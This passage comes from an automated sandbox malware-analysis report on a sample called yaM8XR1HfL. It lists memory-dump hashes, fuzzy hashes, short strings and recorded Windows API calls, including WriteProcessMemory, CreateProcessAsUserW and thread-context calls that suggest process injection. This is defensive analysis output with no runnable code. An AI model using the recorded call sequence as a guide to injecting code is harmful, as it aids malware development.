                • Opcode ID: cf1ffd60d6f97f7a9d701b5d2db92349b38d28f25a4ed4103ae9c53f577aab9d
                • Instruction ID: 8e7b83e25942630d94c1943520436c16afecde0313bebf3181bc76fdf680b8ae
                • Opcode Fuzzy Hash: cf1ffd60d6f97f7a9d701b5d2db92349b38d28f25a4ed4103ae9c53f577aab9d
                • Instruction Fuzzy Hash: 947120B0D11219CFCB44DFA9C994AEEBBB2BF89301F24852AD816BB344DB345941CF55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: <
                • API String ID: 0-4251816714
                • Opcode ID: 495761bbbbe13f7968f72a47664248a875fff7441066e18f86279df5d4d1efb8
                • Instruction ID: 2e36b0f2c62da739e1e0c6ea2672a3fc0127f5a365292fcbcf0810fc31a2b0d6
                • Opcode Fuzzy Hash: 495761bbbbe13f7968f72a47664248a875fff7441066e18f86279df5d4d1efb8
                • Instruction Fuzzy Hash: 946175B5D01658CFDB58CFAAC9446DDBBF2BF89301F14C5AAD408AB224EB345A85CF50
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a0ac1e62f780f6b2007d3244844fc9c221b2aa0ccbf1c0efe8a0f53d298e1a11
                • Instruction ID: bf59864a35938982273ccb599cae10655877194d430c5ea0b0dba54bb03b2ea0
                • Opcode Fuzzy Hash: a0ac1e62f780f6b2007d3244844fc9c221b2aa0ccbf1c0efe8a0f53d298e1a11
                • Instruction Fuzzy Hash: E832CBB0B012058FDB59EFB9D454BAEB7F6AF88700F14856AE5469B390CB34ED01CB61
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c86accbba9e0479df0519c566d706aeb51c7b52ee69c6e4e574c734f897d3af9
                • Instruction ID: f326c3e71e7b8def1a2364bd49808290b28198facf14080ed8cea97a12bce51b
                • Opcode Fuzzy Hash: c86accbba9e0479df0519c566d706aeb51c7b52ee69c6e4e574c734f897d3af9
                • Instruction Fuzzy Hash: E7525C74A003558FCB14DF28C844B99B7B2FF85314F2586A9E5586F3A2DB71AD82CF81
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bdcc612d0ebd88dee2c8f477d82c649f1707fdbe2f636aead9d628c2569902d9
                • Instruction ID: e34b8f2200bc460d31c2444037c104d4d6d65dfe2bd374819e502b9c6c4c2e04
                • Opcode Fuzzy Hash: bdcc612d0ebd88dee2c8f477d82c649f1707fdbe2f636aead9d628c2569902d9
                • Instruction Fuzzy Hash: DA526D74A003458FCB14DF28C844B99B7B2FF85314F2586E9E5586F3A2DB71A982CF81
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b0d776c3d313603fce891fff5eeb6ab50d77f43d150b55ca0e513bdd84e2490
                • Instruction ID: 3f0f60d6211dac9460c102cc22f21665bf0d05adb8a45e50f6c8ef990f6a94dd
                • Opcode Fuzzy Hash: 4b0d776c3d313603fce891fff5eeb6ab50d77f43d150b55ca0e513bdd84e2490
                • Instruction Fuzzy Hash: 34C109F4E1120ADFCB04DFA9C4858EEFBB2FF89301B249556D416AB254D734A982CF91
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b7db86b210ce44472dbaa34de711ae37133dbdf489d3355cae4fd244c67f9bb2
                • Instruction ID: a98e6bf16cbb2b372e7a2773f20bc23700d1798036cdb7c5a5e9d2914b4777ee
                • Opcode Fuzzy Hash: b7db86b210ce44472dbaa34de711ae37133dbdf489d3355cae4fd244c67f9bb2
                • Instruction Fuzzy Hash: 4BD12A74D112698FCB68DF25C85479DBBF6BF89300F10CAEAD40AA7214DB749A868F40
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 71e9647864539a91bd1f23cfd00ada6c127b351655ce56573e82974390e8d140
                • Instruction ID: c611496eb1010ba1a09dd229cd887a129bae68b05871e60f9397306e74b41a9f
                • Opcode Fuzzy Hash: 71e9647864539a91bd1f23cfd00ada6c127b351655ce56573e82974390e8d140
                • Instruction Fuzzy Hash: 14C1D6F0E1120ADFCB14DFA9C4858AEFBB2FF89301B209556D416AB354D734A982CF95
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: babc990b0278a905977487d681c1a1ad97d92f96752e4d18f52ec1215361e73b
                • Instruction ID: adf00baa6f3b7eafd0ef5ea0be9880f2e766088352b2b796e3ad0923b037f639
                • Opcode Fuzzy Hash: babc990b0278a905977487d681c1a1ad97d92f96752e4d18f52ec1215361e73b
                • Instruction Fuzzy Hash: 4D9111B4E11259CFDB54DF69D858B9DBFB2BF89300F1081AAE40AAB351DB304A85CF10
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 48d02e202bdfb73d0362fe32c33f5b20a3725cc6173234cba5d9f4ea9f9cbbc9
                • Instruction ID: 557fe9c46fd405f68dbb907389b488d87d9d3a15aa6e7211bbd2e61d35e3534c
                • Opcode Fuzzy Hash: 48d02e202bdfb73d0362fe32c33f5b20a3725cc6173234cba5d9f4ea9f9cbbc9
                • Instruction Fuzzy Hash: 446168B0D14219DFCB44DFA9C5956AEBBB1FF89301F00892AE412A7350DBB49A4ACF50
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fd087a3107658f9e0cf08ccae9cceb27c7a7750de6a48fd901171c24fd341663
                • Instruction ID: 1a595afb2c21f27e9715c7b28d20785d5c2d6715825fb344ee2b76c56e46d30a
                • Opcode Fuzzy Hash: fd087a3107658f9e0cf08ccae9cceb27c7a7750de6a48fd901171c24fd341663
                • Instruction Fuzzy Hash: A4512AB0E182098FDB08CFAAC4455EEFBF2BF89300F24D46AD415A7264D7349A41CF95
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c611967e03b4ed5776434d98a4078ba3d39262c8655bd7a8910bbf63d66a61fe
                • Instruction ID: 41b7e4fc7bddcee62a71dc46425165eec8d7d23cbe399ddf7b4e86b8b9bc0571
                • Opcode Fuzzy Hash: c611967e03b4ed5776434d98a4078ba3d39262c8655bd7a8910bbf63d66a61fe
                • Instruction Fuzzy Hash: 2F516CB0D14219DFDB44DFA8C5A96ADBBB1FF89301F00896AE413A7354DB745A4ACF10
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3fb02995d074292d70ddb95fa3108939817cea4572347e6eab63180f00eb32c
                • Instruction ID: 7c813ce07b70511c856f5842de2f80b3bcd6cc47140fc94671c3b328c0c7a231
                • Opcode Fuzzy Hash: f3fb02995d074292d70ddb95fa3108939817cea4572347e6eab63180f00eb32c
                • Instruction Fuzzy Hash: 5A51C0B0D0934ADFDB45CFA5C8406AEBFB1FF8A310F14995AD462A7250D338460ACF91
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d8f1a33684220d5680b9bb86beea8a702cd0d709b471a2d5b71f6f4fd87db81
                • Instruction ID: 732e316407e8728de58e66cdfdb83f6fca8f20055b037aeeadabbd077acd6870
                • Opcode Fuzzy Hash: 2d8f1a33684220d5680b9bb86beea8a702cd0d709b471a2d5b71f6f4fd87db81
                • Instruction Fuzzy Hash: 504147B0D1520ADBDB84DFE6D8415EEFBB5FF8A310F10992AD922B6210D73446468FA4
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bf5d1194f98625ba84ef3210efca9caba8f76361ebe69bbbd3a160f8ea329ed
                • Instruction ID: 85ddc082dbbec7a0c46e9e75272e9a85d7f67789ad071231174805147ee8b4a6
                • Opcode Fuzzy Hash: 2bf5d1194f98625ba84ef3210efca9caba8f76361ebe69bbbd3a160f8ea329ed
                • Instruction Fuzzy Hash: 5131E8B1E016588BEB18CFAAD8543DEBBF2AFC9310F14C16AD409AB254DB751A45CF50

                Control-flow Graph (graph image not captured; legend: Executed / Not Executed; basic-block edge list for function at eaab28 omitted)
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: $cq$$cq
                • API String ID: 0-2695052418
                • Opcode ID: 848db13104c3503da89831d9a5d77d2271eb4b736e28834e9408fd14ad7477e4
                • Instruction ID: d355d36f4da16a8bce6c6aeab119893579362d176166a23cac34394a24e2f312
                • Opcode Fuzzy Hash: 848db13104c3503da89831d9a5d77d2271eb4b736e28834e9408fd14ad7477e4
                • Instruction Fuzzy Hash: ED523F74A00218CFEF149BA4C864BAEBB77FF88300F1180A9D14A6B395DF359E959F51

                Control-flow Graph (graph image not captured; legend: Executed / Not Executed; basic-block edge list for function at ea5ef8 omitted)
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Hgq$Hgq
                • API String ID: 0-3391890871
                • Opcode ID: 960f31014448f4afa35917bc8b7ae1111e504ec38ff07a43a4fffa843e74372e
                • Instruction ID: cca7f8298bdcf4dff8ffde52f258fe389b3a42f4b1452f1ff84b69d8998febd2
                • Opcode Fuzzy Hash: 960f31014448f4afa35917bc8b7ae1111e504ec38ff07a43a4fffa843e74372e
                • Instruction Fuzzy Hash: 99E1D9307002159FDB15AF68D868B7E7BA6EB8E344F188428E516EB391DF34EC41DB91
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: PHcq$PHcq
                • API String ID: 0-4229179212
                • Opcode ID: 3e79482b9e50d17a82ec350575b06cef7665bae9b8c1d2cd49270eb42c8aefbe
                • Instruction ID: 0be903ac282c964e276c5aa1fd6122dbe1cdb5494bbb86c76d70976068db3d57
                • Opcode Fuzzy Hash: 3e79482b9e50d17a82ec350575b06cef7665bae9b8c1d2cd49270eb42c8aefbe
                • Instruction Fuzzy Hash: 5FC1E4B4600215CFDB14DF68C994AAEBBF2FF88711B2545A8E416AB3A1DB31EC41CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 4'cq$Tecq
                • API String ID: 0-1269237527
                • Opcode ID: a1bbe4edd94e429a3da95d8240d6548f5f6d2bf759a31a9b19dbcfff7b3445b9
                • Instruction ID: 1fbd2fba8e74134720f071493de16e83bdbecc2ef42003f6a6438f8cd3f378a7
                • Opcode Fuzzy Hash: a1bbe4edd94e429a3da95d8240d6548f5f6d2bf759a31a9b19dbcfff7b3445b9
                • Instruction Fuzzy Hash: 57B18F71A00219CFCB14DF68D984AAEBBB1FF89304F159469E809BB3A1DB31ED45CB51
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: 8gq$8gq
                • API String ID: 0-2080003314
                • Opcode ID: 9389a1028e5f5a41c3ef28449ee8783d981d7696c363f8bb86a424bcc03fcf43
                • Instruction ID: 3e135aa116a8d14c72b544c269e9124abf8c6d9ea995a45eaf22820662a31f9c
                • Opcode Fuzzy Hash: 9389a1028e5f5a41c3ef28449ee8783d981d7696c363f8bb86a424bcc03fcf43
                • Instruction Fuzzy Hash: C471B4B4E01218DFDB14DFA9D994ADDBBB2BF89300F20816AE415AB3A4DB745941CF50
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: (gq$Hgq
                • API String ID: 0-3303014377
                • Opcode ID: af926182fe316cace60427f8dfb95febb26e340e0ba86dac3d6b2368e5da504b
                • Instruction ID: b9006b73efa9661c1824f84e38ebe6bef840e8ba06a5225cd96998063addeb57
                • Opcode Fuzzy Hash: af926182fe316cace60427f8dfb95febb26e340e0ba86dac3d6b2368e5da504b
                • Instruction Fuzzy Hash: AA5112F17041919FE718AF38C4946BD7BE6EF85300F1884BAE4599B791CB34AC42DB92
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2494359920.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_ea0000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: Hgq$Hgq
                • API String ID: 0-3391890871
                • Opcode ID: 7a7a48c7f1531e75ed54a2c7a55d094cdfaa5b2a3c5ca7106b107629d787d1d7
                • Instruction ID: a2e427e8523bc0d388ded5326b11e47eb121cc86f1594888c8edb330b09d67d5
                • Opcode Fuzzy Hash: 7a7a48c7f1531e75ed54a2c7a55d094cdfaa5b2a3c5ca7106b107629d787d1d7
                • Instruction Fuzzy Hash: D351AB313042559FDB15DF28C850AAA7BE6FF8E308F058469E809AF392DB35EC41C791
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: TJhq$Tecq
                • API String ID: 0-1580033827
                • Opcode ID: 9d3c94075bc42d4ad717779d322fbf49bdfeb28e3574d3030cac6ef3b3b771e0
                • Instruction ID: 6779a0fc3df46a87050e12a24fafac702a70c74adbd7158b84070f2f31dde1a4
                • Opcode Fuzzy Hash: 9d3c94075bc42d4ad717779d322fbf49bdfeb28e3574d3030cac6ef3b3b771e0
                • Instruction Fuzzy Hash: 0C31C4717141118FCB05BBBCE598A2E7BF6FF89610B5148A9E449DB3A6CF389C09C351
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: TJhq$Tecq
                • API String ID: 0-1580033827
                • Opcode ID: c9cba196ee832d7d607ba26220ded3ced486d9d52b1b7a842414db1fceb69be7
                • Instruction ID: e759a462420ec7a3aa8d5e30573d9e36a5572bcf3774074c0ef13d010b4994f4
                • Opcode Fuzzy Hash: c9cba196ee832d7d607ba26220ded3ced486d9d52b1b7a842414db1fceb69be7
                • Instruction Fuzzy Hash: F421E4317101158FCB04BBBDE59DA2E77FAFFC9610B404869E409D7399CE349C0583A1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509920477.0000000007B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7b70000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: #l^
                • API String ID: 0-3339438350
                • Opcode ID: 2902dc5d3b0f12ed7e4376fd28fd42bc48918eaae53c1d4c4d2cda689c0984dd
                • Instruction ID: 8846286a8c1af9211411865966af407bec731c90e2048e751a4b69e5a722a73f
                • Opcode Fuzzy Hash: 2902dc5d3b0f12ed7e4376fd28fd42bc48918eaae53c1d4c4d2cda689c0984dd
                • Instruction Fuzzy Hash: 1E223CF0905F434EE7746F68C5C839EB6A0EB09364F20699FC4FA89265D735E086CB49
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2509104692.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7210000_yaM8XR1HfL.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 27ed58e7e5a3c5bc91bf346acbe7e4896329b3af29454e02b4cdf6233bfa1582
                • Instruction ID: 9a5371b205e830f604b8808fb0cb039334501571b02348d15cc49d269e1dd234
                • Opcode Fuzzy Hash: 27ed58e7e5a3c5bc91bf346acbe7e4896329b3af29454e02b4cdf6233bfa1582
                • Instruction Fuzzy Hash: 91D1F070A15345CFCB05FBB8E59966D7BF2BF89200F8188A9E045E7365DE389809CB51
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075686E3
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 2c6cea1dfc5b0c915d25233480485e0a86873a0090bdeb9a776b38222e66834b
                • Instruction ID: 6a62230ce45c34d4f038e22292fa7f4ce2f6782c62d3c0f186013131f8492ff0
                • Opcode Fuzzy Hash: 2c6cea1dfc5b0c915d25233480485e0a86873a0090bdeb9a776b38222e66834b
                • Instruction Fuzzy Hash: AB5127B29007819ECB10CF59E84CADBBBF0FF65365F14882AD4A597511C334B4468BD5
                APIs
                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07685E0B
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: CreateProcessUser
                • String ID:
                • API String ID: 2217836671-0
                • Opcode ID: d89ec6fb814206d1b68541752efba54d078dca2f0f6453c22f1e24bfc09ad5fc
                • Instruction ID: ee3248891cdebc38ae0096f6a05b1666d8e1a16dbfe5bc117271623100c08c11
                • Opcode Fuzzy Hash: d89ec6fb814206d1b68541752efba54d078dca2f0f6453c22f1e24bfc09ad5fc
                • Instruction Fuzzy Hash: 99510AB1D0025ADFCB21DF69C844BDDBBB1BF48310F04859AE919B7250DB719A89CF90
                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05C31541
                Memory Dump Source
                • Source File: 00000000.00000002.2507707388.0000000005C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_5c30000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: d4d9c4e3a9a410a966d6fb056847746a40115987cff9b0a8ac178a6a2d4fe37b
                • Instruction ID: 6abf9a697d88eb1b2694c566eaa110a458ececa7e8fd56a7dff85f4d7c5e944a
                • Opcode Fuzzy Hash: d4d9c4e3a9a410a966d6fb056847746a40115987cff9b0a8ac178a6a2d4fe37b
                • Instruction Fuzzy Hash: E241F7B59003498FDB14CF99C449AAABBF5FB88314F25C859D51AAB321D374A941CFA0
                APIs
                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 076877EE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 2d9347f412255e14e210edaf0f8e98032c8819aef3cba4eb0fdfa84c57bc90a1
                • Instruction ID: 2e63b5c2d9b1ad8e3c4df58ac62cfd9e895aa3dcb314515120c6224f838e870e
                • Opcode Fuzzy Hash: 2d9347f412255e14e210edaf0f8e98032c8819aef3cba4eb0fdfa84c57bc90a1
                • Instruction Fuzzy Hash: 39319AB1D003498FCB10DFA9C8857EEBBF0EF48324F24856AD819A7341C7385A41DB91
                APIs
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0756E77B
                Memory Dump Source
                • Source File: 00000000.00000002.2509404040.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7560000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 120bd1a3659b151de40f6f3da53ebd6334514ef6c82eb68af8dd55f3391053da
                • Instruction ID: 6210b4666b3f0794a939ad541807058915a4f1c141022b3cbb6fc1505f8f1bec
                • Opcode Fuzzy Hash: 120bd1a3659b151de40f6f3da53ebd6334514ef6c82eb68af8dd55f3391053da
                • Instruction Fuzzy Hash: 67315AB5D01259CFCB10CF9AD4856DEBBF4FB48311F10846AE868A7350D7789541DF91
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07688248
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 0b6b244be94697cb0813e646d6781bef18a8957eb8599c32499b8e1078534fdd
                • Instruction ID: f13ed026eb47ae4b9dfdaaa2ced70a2ca724b7fea3bc22914067dd8fee3fd023
                • Opcode Fuzzy Hash: 0b6b244be94697cb0813e646d6781bef18a8957eb8599c32499b8e1078534fdd
                • Instruction Fuzzy Hash: CE2146B6D0030A8FCB10DFA9C9857DEBBF1FF48310F10882AE919A7240C7789945DBA0
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07688248
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 5d8426fa3ba55fab5dfdfabb2d8be0f1b7a2271dddd119802d1e1f21e685d96a
                • Instruction ID: 56c8261149f0ca3ce78b9cfab37518abdc4c442337ddb10ee873ef346b9ca5e5
                • Opcode Fuzzy Hash: 5d8426fa3ba55fab5dfdfabb2d8be0f1b7a2271dddd119802d1e1f21e685d96a
                • Instruction Fuzzy Hash: 5B2157B1D0030A9FCB10DFA9C885BDEBBF5FF88310F108429E919A7240C778A945CBA1
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07688EFE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: abae735817d701ba2969639e7368d74f4a81000be0e468df741ae0d29178b07f
                • Instruction ID: 5b13b35af80c3bc604ace2c010c5f39113c75ab35fbf2c86971d0fa150583826
                • Opcode Fuzzy Hash: abae735817d701ba2969639e7368d74f4a81000be0e468df741ae0d29178b07f
                • Instruction Fuzzy Hash: E62137B2D102098FDB50DFAAC4857EEBBF5EF88324F14842AD45AA7240D7789945CFA1
                APIs
                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 076877EE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 3914f9d2d3052d9c953c4286d5dd36fe08edc13c16901b22c16f1fc3b721df2f
                • Instruction ID: 2b18aaf21c303d541ea355d039ec351d9ce7cb67dd7a2610738a290adcdfee99
                • Opcode Fuzzy Hash: 3914f9d2d3052d9c953c4286d5dd36fe08edc13c16901b22c16f1fc3b721df2f
                • Instruction Fuzzy Hash: 392139B5D002098FDB10DFA9C5857EEBBF4AF48315F24C429D419A7241D7789945CF91
                APIs
                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 076877EE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: d3293fc4d82bca28039cf8e2024a0acfb3cae010e56bc917f3b417da2b545cb3
                • Instruction ID: 32dea57b5aaab1c6e1b6522837139f9d541053bb2c4f3dfd6394e7d691612890
                • Opcode Fuzzy Hash: d3293fc4d82bca28039cf8e2024a0acfb3cae010e56bc917f3b417da2b545cb3
                • Instruction Fuzzy Hash: 5F2107B1D003098FDB10DFAAC4857AEBBF5EF88325F248429D559A7240D7789945CFA1
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07688EFE
                Memory Dump Source
                • Source File: 00000000.00000002.2509599136.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7680000_yaM8XR1HfL.jbxd
                Similarity
                • API ID: ContextThreadWow64
